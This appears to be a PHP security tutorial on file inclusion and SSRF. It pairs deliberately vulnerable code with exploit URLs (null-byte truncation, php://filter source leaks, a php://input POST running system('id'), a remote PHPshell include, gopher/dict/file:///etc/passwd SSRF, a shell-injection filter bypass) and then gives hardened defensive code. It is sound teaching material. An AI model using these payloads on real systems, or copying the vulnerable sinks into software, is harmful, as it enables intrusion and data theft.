PHP Security Vulnerabilities: File Inclusion and SSRF Attacks Explained
<div id="navCategory"><h5 class="catalogue">Contents</h5><ul class="first_class_ul"><li><a href="#_label0">Preface</a></li><li><a href="#_label1">Part 1: File Inclusion Vulnerabilities in Detail</a></li><ul class="second_class_ul"><li><a href="#_lab2_1_0">What is a file inclusion vulnerability?</a></li><li><a href="#_lab2_1_1">Types of file inclusion vulnerability</a></li></ul><li><a href="#_label2">Part 2: SSRF Vulnerabilities in Depth</a></li><ul class="second_class_ul"><li><a href="#_lab2_2_2">What is SSRF?</a></li><li><a href="#_lab2_2_3">Common dangerous functions</a></li><li><a href="#_lab2_2_4">SSRF bypass techniques</a></li></ul><li><a href="#_label3">Best practices for defending against SSRF</a></li><ul class="second_class_ul"></ul><li><a href="#_label4">Conclusion</a></li><ul class="second_class_ul"></ul></ul></div><p class="maodian"><a name="_label0"></a></p><h2>Preface</h2><p>In web security, the security of PHP applications has long drawn attention. This article examines two common classes of PHP vulnerability, file inclusion and server-side request forgery (SSRF), to help developers understand how they arise, how they are exploited, and how to defend against them.</p>
<p class="maodian"><a name="_label1"></a></p><h2>Part 1: File Inclusion Vulnerabilities in Detail</h2>
<p class="maodian"><a name="_lab2_1_0"></a></p><h3>What is a file inclusion vulnerability?</h3>
<p>A file inclusion vulnerability is a common problem in PHP applications. When a developer uses an inclusion function to pull in a file and the filename parameter is not strictly validated, an attacker can use it to read sensitive files or even execute arbitrary code: PHP parses whatever file is included as code, so anything the attacker can place on disk, or supply through a stream wrapper, becomes executable.</p>
<p><strong>Dangerous functions</strong></p>
<p>PHP has four main file inclusion functions. All four are equally dangerous with respect to this vulnerability; they differ only in whether a missing file is a warning (include) or a fatal error (require), and whether an already-included file is skipped (the _once variants):</p>
<ul><li>include()</li><li>include_once()</li><li>require()</li><li>require_once()</li></ul>
<p class="maodian"><a name="_lab2_1_1"></a></p><h3>Types of file inclusion vulnerability</h3>
<p><strong>1. Local File Inclusion (LFI)</strong></p>
<p>Exploitation:</p>
<ul><li>Read the flag file directly (the CTF scenario; in a real application this would be configuration files or credentials)</li><li>Read source code through PHP stream wrappers (pseudo-protocols)</li><li>Write a PHP trojan somewhere the include can reach and include it to obtain a webshell</li></ul>
<p>Example code (demo1.php):</p>
<div class="jb51code"><pre class="brush:php;"><?php
// The only check is file_exists(); the user controls everything before the
// ".php" suffix, including "../" sequences.
$file = $_GET['file'];
if(file_exists('/home/www/'.$file.'.php')) {
    include '/home/www/'.$file.'.php';
} else {
    include '/home/www/'.'home.php';   // default page
}
?>
</pre></div>
<p>Exploitation:</p>
<div class="jb51code"><pre class="brush:php;">http://www.example.com/demo1.php?file=flag.php%00
</pre></div>
<p>The %00 null byte terminates the string at the C level, so both file_exists() and include() see /home/www/flag.php and the appended .php is discarded. This truncation only works on PHP older than 5.3.4; later versions reject paths containing a null byte. On current PHP the same code remains exploitable by directory traversal (file=../../path/to/target), but only for files that actually end in .php.</p>
<p><strong>2. Exploitation through PHP stream wrappers (pseudo-protocols)</strong></p>
<p>Commonly used wrappers. These apply where the parameter reaches include() without a directory prefix, as in index.php?file=...:</p>
<p>file:// (absolute path to a local file; as a local wrapper it works regardless of allow_url_include):</p>
<div class="jb51code"><pre class="brush:php;">http://www.example.com/index.php?file=file://D:/phpStudy/WWW/flag.txt
</pre></div>
<p>php://filter (passes the file through a filter chain; base64-encoding the output means the PHP source is returned as text instead of being executed, which leaks the source of index.php or any other readable file; does not require allow_url_include):</p>
<div class="jb51code"><pre class="brush:php;">http://example.com/index.php?file=php://filter/read=convert.base64-encode/resource=index.php
</pre></div>
<p>php://input (the raw POST body becomes the included file, so the body is executed as PHP; requires allow_url_include = On):</p>
<div class="jb51code"><pre class="brush:php;">POST /index.php?file=php://input HTTP/1.1
...
<?php system('id'); ?>
</pre></div>
<p><strong>3. Remote File Inclusion (RFI)</strong></p>
<p>Prerequisites (both are php.ini settings; allow_url_include is Off by default and has been deprecated since PHP 7.4, so RFI is rare on current deployments):</p>
<ul><li>allow_url_fopen = On</li><li>allow_url_include = On</li></ul>
<p>Example code (demo4.php):</p>
<div class="jb51code"><pre class="brush:php;"><?php
// The user-supplied value becomes the start of the path, so it can be a URL.
// The @ only silences the notice raised when the parameter is missing.
$basePath = @$_GET['param'];
require_once $basePath.'/action/m_share.php';
?>
</pre></div>
<p>Exploitation:</p>
<div class="jb51code"><pre class="brush:php;">http://www.example.com/demo4.php?param=http://www.xx.com/attacker/PHPshell.txt?
</pre></div>
<p>The trailing ? turns the application's suffix /action/m_share.php into a query string of the remote URL, so the attacker's server still serves PHPshell.txt and the vulnerable server executes its contents. The file is given a non-PHP extension so that the attacker's own host returns the source as text rather than executing it.</p>
<p><strong>Countermeasures</strong></p>
<p>1. Allowlist validation: map the parameter to a fixed set of filenames and never concatenate it into a path.</p>
<p>2. Disable the dangerous settings in php.ini. allow_url_include = Off is the one that stops RFI and is already the default; allow_url_fopen = Off also disables legitimate URL reads through file_get_contents() and similar functions, so check what the application needs before turning it off:</p>
<div class="jb51code"><pre class="brush:bash;">allow_url_fopen = Off
allow_url_include = Off
</pre></div>
<p>3. Set open_basedir so that every file operation is confined to the listed directories.</p>
<p>4. Strictly validate user input: reject "..", path separators, null bytes and anything containing "://".</p>
<p>5. Avoid dynamic inclusion altogether where a static include, or a switch over a fixed set of values, will do.</p>
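<p>The allowlist approach of point 1 combined with the directory check of point 3, as an added example that is not code from the original article (the template directory and the page names are assumptions):</p>

```php
<?php
// Added example, not code from the original article: a hardened replacement for
// the demo1.php shown above. The template directory and page names are assumed.

const TEMPLATE_DIR = '/home/www/templates';

// 1. Allowlist: the request parameter is only ever used as an array key, so it is
//    never concatenated into a path. Null bytes, "../" and "php://" are irrelevant.
const PAGES = [
    'home'    => 'home.php',
    'about'   => 'about.php',
    'contact' => 'contact.php',
];

function resolvePage($key): string
{
    // ?file[]=x arrives as an array; treat anything that is not a plain string
    // (or not a known key) as the default page instead of letting it reach the lookup.
    if (!is_string($key) || !isset(PAGES[$key])) {
        $key = 'home';
    }
    $name = PAGES[$key];

    // 2. Defence in depth (the same idea as open_basedir, enforced in code):
    //    realpath() collapses ".." and symlinks and returns false for a missing
    //    file, so a template that somehow points outside TEMPLATE_DIR is refused.
    $base = realpath(TEMPLATE_DIR);
    $path = realpath(TEMPLATE_DIR . '/' . $name);
    if ($base === false || $path === false
        || strncmp($path, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        throw new RuntimeException('template resolves outside ' . TEMPLATE_DIR);
    }
    return $path;
}

// Usage: demo1.php?file=about includes /home/www/templates/about.php;
// demo1.php?file=../../etc/passwd%00 and demo1.php?file=php://input both fall
// back to home.php because neither string is a key in PAGES.
include resolvePage($_GET['file'] ?? 'home');
```

<p>The realpath() check is redundant as long as PAGES only contains plain filenames, which is exactly why it belongs there: it keeps the include safe if someone later adds a computed or user-influenced entry to the map.</p>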
<p class="maodian"><a name="_label2"></a></p><h2>Part 2: SSRF Vulnerabilities in Depth</h2>
<p class="maodian"><a name="_lab2_2_2"></a></p><h3>What is SSRF?</h3>
<p>SSRF (Server-Side Request Forgery) is a vulnerability in which an attacker gets the server to issue a request the attacker constructs. Because the request originates from the server, the attacker can reach internal systems that are not reachable from the internet: services bound to localhost, hosts on the internal network and, on cloud instances, the metadata endpoint.</p>
<p class="maodian"><a name="_lab2_2_3"></a></p><h3>Common dangerous functions</h3>
<p>Any function that opens a user-supplied URL or socket on the server is a potential SSRF sink. The three below are the ones most often found in PHP code.</p>
<p><strong>1. file_get_contents()</strong></p>
<div class="jb51code"><pre class="brush:php;"><?php
// The URL from the POST body is fetched with no validation at all, and the
// response is written to disk and served back as an image, so the attacker
// can also read whatever the server fetched (full-response SSRF).
if (isset($_POST['url'])) {
    $content = file_get_contents($_POST['url']);
    $filename = '/images/'.rand().'img1.jpg';
    file_put_contents($filename, $content);
    echo $_POST['url'];
    $img = "<img src=\"".$filename."\"/>";
    echo $img;
}
?>
</pre></div>
<p><strong>2. fsockopen()</strong></p>
<p>fsockopen() opens a raw TCP connection, so when host and port come from the user the attacker can talk to any TCP service, not only HTTP servers:</p>
<div class="jb51code"><pre class="brush:php;"><?php
// Host, port and path are all caller-controlled; a typical sink is
// GetFile($_GET['host'], $_GET['port'], $_GET['link']).
function GetFile($host, $port, $link) {
    $fp = fsockopen($host, intval($port), $errno, $errstr, 30);
    if (!$fp) {
        echo "$errstr (error number $errno) \n";
    } else {
        // Hand-built HTTP request; the Host header is attacker-controlled too.
        $out = "GET $link HTTP/1.1\r\n";
        $out .= "Host: $host\r\n";
        $out .= "Connection: Close\r\n\r\n";
        fwrite($fp, $out);
        $contents = '';
        while (!feof($fp)) {
            $contents .= fgets($fp, 1024);
        }
        fclose($fp);
        return $contents;
    }
}
?></pre></div>
<p><strong>3. curl_exec()</strong></p>
<p>cURL understands many schemes besides http (gopher, dict, file, ftp and more). Unless CURLOPT_PROTOCOLS is set, a user-supplied URL may use any of them, which is what enables the protocol-switching bypasses below:</p>
<div class="jb51code"><pre class="brush:php;"><?php
// The URL is handed to cURL unchanged; the result is both saved and echoed.
if (isset($_POST['url'])) {
    $link = $_POST['url'];
    $curlobj = curl_init();
    curl_setopt($curlobj, CURLOPT_POST, 0);
    curl_setopt($curlobj, CURLOPT_URL,$link);
    curl_setopt($curlobj, CURLOPT_RETURNTRANSFER, 1);
    $result = curl_exec($curlobj);
    curl_close($curlobj);
    $filename = './curled/'.rand().'.txt';
    file_put_contents($filename, $result);
    echo $result;
}
?>
</pre></div>
<p class="maodian"><a name="_lab2_2_4"></a></p><h3>SSRF bypass techniques</h3>
<p>1. IP encoding bypasses</p>
<p>Filters that block the literal strings 127.0.0.1 or 10.x.x.x are defeated by other spellings of the same address. A wildcard DNS service such as xip.io resolves any name that embeds an IP to that IP, so the URL never contains a bare internal address:</p>
<blockquote><p>10.0.0.1.xip.io</p></blockquote>
<p>Alternatively the IP is written as a single decimal number: 127.0.0.1 becomes 2130706433 (hexadecimal 0x7f000001 and octal 0177.0.0.1 are accepted by most resolvers as well).</p>
<p>2. Protocol switching</p>
<p>Where the sink is curl_exec() with no CURLOPT_PROTOCOLS restriction, schemes other than http can be used.</p>
<p>dict:// (sends a single line to an arbitrary TCP port; useful for port scanning and for services that accept one-line commands):</p>
<blockquote><p>dict://192.168.1.1:8080/test:dict</p></blockquote>
<p>gopher:// (sends an arbitrary, URL-encoded byte sequence to a TCP port):</p>
<blockquote><p>gopher://192.168.1.1/gopher</p></blockquote>
<p>file:// (reads a local file on the server):</p>
<blockquote><p>file:///etc/passwd</p></blockquote>
<p>3. Advanced exploitation with gopher</p>
<p>Because gopher writes raw bytes to the socket, it can speak the line-based protocols of many services:</p>
<blockquote><p>FTP<br />Telnet<br />Redis<br />Memcache</p></blockquote>
<p>Redis attack example. The sink is an unrestricted cURL call; the attacker supplies a gopher:// URL whose path encodes Redis commands (this requires the server's cURL build to support gopher):</p>
<div class="jb51code"><pre class="brush:php;"><?php
// No scheme restriction: gopher://, dict:// and file:// all reach curl_exec().
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $_GET["url"]);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_HEADER, 0);
$output = curl_exec($ch);
curl_close($ch);
?>
</pre></div>
<p>4. filter_var() bypass</p>
<p>The code below tries to restrict requests to one domain by validating the URL with filter_var(), matching the host with a regular expression, and then shelling out to curl:</p>
<div class="jb51code"><pre class="brush:php;"><?php
$url = $_GET['url'];
echo "Argument: ".$url. "\n";
// FILTER_VALIDATE_URL only checks syntax; any scheme is accepted.
if(filter_var($url, FILTER_VALIDATE_URL)) {
    $r = parse_url($url);
    var_dump($r);
    // Only the end of the host is anchored, and the host is passed to a shell.
    if (preg_match('/skysec\.top$/', $r['host'])) {
        exec("curl -v -s ".$r['host']."", $a);
    } else {
        echo "Error: Host not allowed";
    }
} else {
    echo "Error: Invalid URL";
}
?>
</pre></div>
<p>Bypass:</p>
<div class="jb51code"><pre class="brush:php;">http://example.com/test.php?url=0://192.168.1.1.com:8080;skysec.top:80/
</pre></div>
<p>filter_var() accepts this URL because its hostname checks only run for the http and https schemes, and parse_url() takes the trailing :80 as the port, leaving the host as 192.168.1.1.com:8080;skysec.top. That string matches /skysec\.top$/, and exec() then hands it to a shell, where the semicolon ends the curl command: curl is actually run against 192.168.1.1.com:8080, and skysec.top:80 is executed as a separate, failing command. Two independent mistakes make this work: checking the host by regex suffix instead of exact match (attacker-skysec.top would also pass), and building a shell command line from user input instead of calling curl_exec().</p>
<p>5. Bypass via 30x redirects</p>
<p>With CURLOPT_FOLLOWLOCATION enabled, any check applied to the original URL is pointless: the attacker supplies a URL on a host they control that answers with a 302 and a Location header pointing at an internal address, and cURL follows it without the application ever seeing the redirect target:</p>
<div class="jb51code"><pre class="brush:php;"><?php
$url = $_GET['url'];
print $url;
curl($url);
function curl($url) {
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, $url);
    curl_setopt($ch, CURLOPT_HEADER, 0);
    // Follows Location: headers automatically; the redirect target is never validated.
    curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
    curl_exec($ch);
    curl_close($ch);
}
?>
</pre></div>
<p class="maodian"><a name="_label3"></a></p><h2>Best practices for defending against SSRF</h2>
<p>Restrict protocols: allow only HTTP and HTTPS. With cURL, enforce this through CURLOPT_PROTOCOLS (and CURLOPT_REDIR_PROTOCOLS) rather than by inspecting the URL string.</p>
<p>Block internal IP addresses: loopback, the RFC 1918 ranges, link-local 169.254.0.0/16 (which includes the cloud metadata endpoint) and their IPv6 equivalents. Apply the check to the address the hostname resolves to, not to the literal in the URL, or decimal, hex and wildcard-DNS spellings slip through.</p>
<p>Use a URL allowlist: match host (and port) exactly against a fixed list, never with a regex suffix.</p>
<p>Disable CURLOPT_FOLLOWLOCATION. If redirects must be supported, follow them manually and run every check again on each Location target.</p>
<p>Validate on the DNS resolution result: resolve the name, check every returned address, then connect to the address you checked (for example via CURLOPT_RESOLVE), so that a DNS rebinding between check and connect cannot change the target.</p>
<p>Filter the response: never echo the raw body of a server-side request to the user; check content type and size, and return only what the feature needs.</p>
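<p>The fetcher below, added here and not part of the original article, implements the practices above and rejects each bypass from the previous section (IP encodings, protocol switching, the filter_var() and suffix-regex weakness, and 30x redirects). Function names, the allowlist entry cdn.example.com and the sample URLs are assumptions. The exact-match allowlist alone rejects every literal in the demo loop; the resolved-address check is the layer that catches an allowlisted hostname that resolves, or is rebound, to an internal address.</p>

```php
<?php
// Added example, not code from the original article: a URL fetcher applying the
// defences listed above. Function names, allowlist and sample URLs are assumed.

// Reject loopback, RFC 1918, link-local (169.254.0.0/16, which includes the cloud
// metadata address), 0.0.0.0/8, ::1, fe80::/10 and IPv4-mapped IPv6 addresses.
// Caveat: PHP's flags do not cover every special range (e.g. 100.64.0.0/10);
// add your own CIDR checks here if your network uses such ranges.
function isPublicIp(string $ip): bool
{
    $flags = FILTER_FLAG_NO_PRIV_RANGE | FILTER_FLAG_NO_RES_RANGE;
    return filter_var($ip, FILTER_VALIDATE_IP, $flags) !== false;
}

// Scheme, exact host allowlist, port and the *resolved* address are all checked
// before any socket is opened. Checking the resolved address rather than the URL
// string defeats decimal/hex/octal IPs and xip.io-style names: the resolver
// normalises them to a real address first. Returns the target to pin to.
function validateTarget(string $url, array $allowedHosts): array
{
    $p = parse_url($url);
    if ($p === false || empty($p['scheme'])) {
        throw new InvalidArgumentException('unparseable URL');
    }
    $scheme = strtolower($p['scheme']);
    if ($scheme !== 'http' && $scheme !== 'https') {      // no gopher://, dict://, file://
        throw new InvalidArgumentException("scheme '$scheme' not allowed");
    }
    if (empty($p['host'])) {
        throw new InvalidArgumentException('missing host');
    }
    $host = strtolower($p['host']);
    if (!in_array($host, $allowedHosts, true)) {           // exact match, not a suffix regex
        throw new InvalidArgumentException("host '$host' not in allowlist");
    }
    $port = $p['port'] ?? ($scheme === 'https' ? 443 : 80);
    if ($port !== 80 && $port !== 443) {                   // no Redis/Memcache ports on an allowed host
        throw new InvalidArgumentException("port $port not allowed");
    }
    $ips = gethostbynamel($host);                          // every A record, not just the first
    if ($ips === false) {
        throw new RuntimeException("cannot resolve '$host'");
    }
    foreach ($ips as $ip) {
        if (!isPublicIp($ip)) {
            throw new RuntimeException("'$host' resolves to non-public address $ip");
        }
    }
    return ['host' => $host, 'port' => $port, 'ip' => $ips[0]];
}

function safeFetch(string $url, array $allowedHosts): string
{
    $t  = validateTarget($url, $allowedHosts);
    $ch = curl_init($url);
    curl_setopt_array($ch, [
        CURLOPT_RETURNTRANSFER => true,
        CURLOPT_PROTOCOLS      => CURLPROTO_HTTP | CURLPROTO_HTTPS, // cURL itself refuses other schemes
        CURLOPT_FOLLOWLOCATION => false,                            // a 30x to an internal host is never followed
        CURLOPT_CONNECTTIMEOUT => 5,
        CURLOPT_TIMEOUT        => 10,
        CURLOPT_MAXFILESIZE    => 1024 * 1024,
        // Pin the connection to the address that was just validated, so a DNS
        // rebinding between the check and the connect cannot change the target.
        CURLOPT_RESOLVE        => ["{$t['host']}:{$t['port']}:{$t['ip']}"],
    ]);
    $body = curl_exec($ch);
    $code = (int) curl_getinfo($ch, CURLINFO_RESPONSE_CODE);
    curl_close($ch);
    if ($body === false || $code < 200 || $code >= 300) {  // a redirect counts as failure
        throw new RuntimeException("fetch failed (HTTP $code)");
    }
    return $body;                                          // caller decides what to expose
}

// Constructed inputs, one per bypass above. All are rejected before any DNS
// lookup or connection is made. A legitimate call would be
// safeFetch('https://cdn.example.com/logo.png', ['cdn.example.com']).
foreach ([
    'http://127.0.0.1/',                       // loopback
    'http://2130706433/',                      // 127.0.0.1 in decimal
    'http://0x7f000001/',                      // 127.0.0.1 in hex
    'http://10.0.0.1.xip.io/',                 // wildcard DNS
    'http://cdn.example.com@169.254.169.254/', // userinfo trick: real host is the metadata IP
    'dict://192.168.1.1:8080/test:dict',       // protocol switch
    'gopher://192.168.1.1/_',                  // protocol switch
    'file:///etc/passwd',                      // protocol switch
    'http://cdn.example.com:6379/',            // allowed host, Redis port
] as $bad) {
    try {
        validateTarget($bad, ['cdn.example.com']);
        echo "UNEXPECTED: accepted $bad\n";
    } catch (Exception $e) {
        echo "rejected $bad: {$e->getMessage()}\n";
    }
}
```

<p>Two design points matter more than the individual checks. First, the URL is never rebuilt from parsed pieces and never passed to a shell; the same string goes to cURL, with CURLOPT_PROTOCOLS and CURLOPT_RESOLVE constraining what cURL may do with it. Second, redirects are refused outright; if a feature genuinely needs them, read the Location header, run validateTarget() on it and fetch again, rather than re-enabling CURLOPT_FOLLOWLOCATION.</p>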
<p class="maodian"><a name="_label4"></a></p><h2>Conclusion</h2>
<p>File inclusion and SSRF can both do serious damage to a web application. Developers who understand how these vulnerabilities arise and how they are exploited are in a far better position to defend against them. Security is an ongoing process: stay alert and keep your knowledge current.</p>